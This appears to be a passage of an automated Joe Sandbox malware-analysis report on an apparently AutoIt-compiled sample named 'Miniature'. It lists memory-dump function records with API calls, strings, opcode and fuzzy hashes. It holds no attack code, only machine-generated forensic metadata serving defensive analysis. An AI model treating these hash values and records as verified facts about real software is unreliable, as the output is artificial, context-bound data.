                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWidehtonsinet_addr
                                                  • String ID: 255.255.255.255
                                                  • API String ID: 2496851823-2422070025
                                                  • Opcode ID: c660e4afc49f516085a7559b731fae640758dc3da6b33ab8e326a0a353f3ed52
                                                  • Instruction ID: e644fab0c904419062338514661d63d4131b2e8d1097e48e87277917715f3edb
                                                  • Opcode Fuzzy Hash: c660e4afc49f516085a7559b731fae640758dc3da6b33ab8e326a0a353f3ed52
                                                  • Instruction Fuzzy Hash: 6C11C275900205ABEB21AF64CC42BAEB364FF04320F10856BF955572C1DA71A810D755
                                                  APIs
                                                    • Part of subcall function 00FA1A36: _memmove.LIBCMT ref: 00FA1A77
                                                    • Part of subcall function 00FEB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00FEB7BD
                                                  • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00FE9A2B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: ClassMessageNameSend_memmove
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 372448540-1403004172
                                                  • Opcode ID: 9fab7c9566f30b815ee7b9961bc9b5a85e7f68c1403aba1ecddda6b7433af634
                                                  • Instruction ID: 02b5b87c24b8d580e86ea86032b08d57c7cd7aecf423cc97be4506437327ce1e
                                                  • Opcode Fuzzy Hash: 9fab7c9566f30b815ee7b9961bc9b5a85e7f68c1403aba1ecddda6b7433af634
                                                  • Instruction Fuzzy Hash: B50128B5A45225AB8B24EFA5CC51DFE7369FF56320F100629F8B2572C1DF385808A660
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: __fread_nolock_memmove
                                                  • String ID: EA06
                                                  • API String ID: 1988441806-3962188686
                                                  • Opcode ID: c4d5123f9a0e94031204926f9150e7243a69c6f1a13645f4caaa575f54ea7812
                                                  • Instruction ID: 17760e4e61898555c2e46cb1d740c41d506a56a5c89666e48cfda42836bc38bb
                                                  • Opcode Fuzzy Hash: c4d5123f9a0e94031204926f9150e7243a69c6f1a13645f4caaa575f54ea7812
                                                  • Instruction Fuzzy Hash: 1501F9728042587EDB28C6A9CC56FFE7BFC9F01301F00419EF552D6181E5B9E6089B60
                                                  APIs
                                                    • Part of subcall function 00FA1A36: _memmove.LIBCMT ref: 00FA1A77
                                                    • Part of subcall function 00FEB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00FEB7BD
                                                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 00FE9923
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: ClassMessageNameSend_memmove
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 372448540-1403004172
                                                  • Opcode ID: 674d8950d121c7bb998014c2553d1aeb434d5262b009d3c90bd2b47310710feb
                                                  • Instruction ID: 15b9b2d6e956af9260ef67dc75e7719af4ab1a30a817136e52aa28567f968a6c
                                                  • Opcode Fuzzy Hash: 674d8950d121c7bb998014c2553d1aeb434d5262b009d3c90bd2b47310710feb
                                                  • Instruction Fuzzy Hash: 3801F7F6E81105ABCB24EBA1CD52EFF73A8AF16310F11001DB84263292DA585E08B6F1
                                                  APIs
                                                    • Part of subcall function 00FA1A36: _memmove.LIBCMT ref: 00FA1A77
                                                    • Part of subcall function 00FEB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00FEB7BD
                                                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 00FE99A6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: ClassMessageNameSend_memmove
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 372448540-1403004172
                                                  • Opcode ID: 84e2d1ed8a37c1a690d53f55e67e80343c3994908c0cee07ecd1c95c5cbbfe1c
                                                  • Instruction ID: 8c977a3d73ab244ee01bd4488ee618162045b90259129ba5a8513d845cd2e28b
                                                  • Opcode Fuzzy Hash: 84e2d1ed8a37c1a690d53f55e67e80343c3994908c0cee07ecd1c95c5cbbfe1c
                                                  • Instruction Fuzzy Hash: 9501DBF6E46119A7CB20EBA5CE52EFF73AC9F12350F110019B88663252DA594E08B6B1
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: ClassName_wcscmp
                                                  • String ID: #32770
                                                  • API String ID: 2292705959-463685578
                                                  • Opcode ID: 46c412589b340353251ac4837520c48a36af20d3b449717056b800fcf668c104
                                                  • Instruction ID: 2091b359069735cdd488327f775d09708e593abe5994374e4b88f2dfda739efc
                                                  • Opcode Fuzzy Hash: 46c412589b340353251ac4837520c48a36af20d3b449717056b800fcf668c104
                                                  • Instruction Fuzzy Hash: 0FE0617290032C17D330995AAC49FA7F7ACEB04730F000017FD44D7001D560D90087D0
                                                  APIs
                                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00FE88A0
                                                    • Part of subcall function 00FB3588: _doexit.LIBCMT ref: 00FB3592
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Message_doexit
                                                  • String ID: AutoIt$Error allocating memory.
                                                  • API String ID: 1993061046-4017498283
                                                  • Opcode ID: 968b6b437816c7795229cf725fbc03435d73c62169520e3be01b3d59cd9e7fa5
                                                  • Instruction ID: 64071eba700110930d26aaf1239a54556a5ae70689bf0e95a6e7f4bba4478c25
                                                  • Opcode Fuzzy Hash: 968b6b437816c7795229cf725fbc03435d73c62169520e3be01b3d59cd9e7fa5
                                                  • Instruction Fuzzy Hash: 95D02B723C035832C23031E6AC0BFCA7A488B45B90F20002AFB48BA0C38DDAA58052D5
                                                  APIs
                                                    • Part of subcall function 00FCB544: _memset.LIBCMT ref: 00FCB551
                                                    • Part of subcall function 00FB0B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00FCB520,?,?,?,00F9100A), ref: 00FB0B79
                                                  • IsDebuggerPresent.KERNEL32(?,?,?,00F9100A), ref: 00FCB524
                                                  • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00F9100A), ref: 00FCB533
                                                  Strings
                                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00FCB52E
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                  • API String ID: 3158253471-631824599
                                                  • Opcode ID: dd2008aece29c17a5dc292600c9615cad7b7b8194dcbf403c73adaeea605759f
                                                  • Instruction ID: b119c4648b3492f48ac47c70e552178bb7ea52b85491808d3911991d10b7b2ed
                                                  • Opcode Fuzzy Hash: dd2008aece29c17a5dc292600c9615cad7b7b8194dcbf403c73adaeea605759f
                                                  • Instruction Fuzzy Hash: 63E06DB42003128FD330AF25E50AB427AE8AF44304F14891DE486CA349DB79D444DF91
                                                  APIs
                                                  • GetSystemDirectoryW.KERNEL32(?), ref: 00FD0091
                                                    • Part of subcall function 0100C6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,00FD027A,?), ref: 0100C6E7
                                                    • Part of subcall function 0100C6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0100C6F9
                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00FD0289
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                  • String ID: WIN_XPe
                                                  • API String ID: 582185067-3257408948
                                                  • Opcode ID: 710b97305b211688809e1eac46558030e81dcbeb0aa075d6266e8980d7ed1df9
                                                  • Instruction ID: 6b07041886a8fc463ba848ef80141b9a4dc072ab2a09ce8237ff38ac523240e7
                                                  • Opcode Fuzzy Hash: 710b97305b211688809e1eac46558030e81dcbeb0aa075d6266e8980d7ed1df9
                                                  • Instruction Fuzzy Hash: AFF03071804209EFDB25DF50D5587EC7BB8AB08300F280086E146A2184CB754F44EF20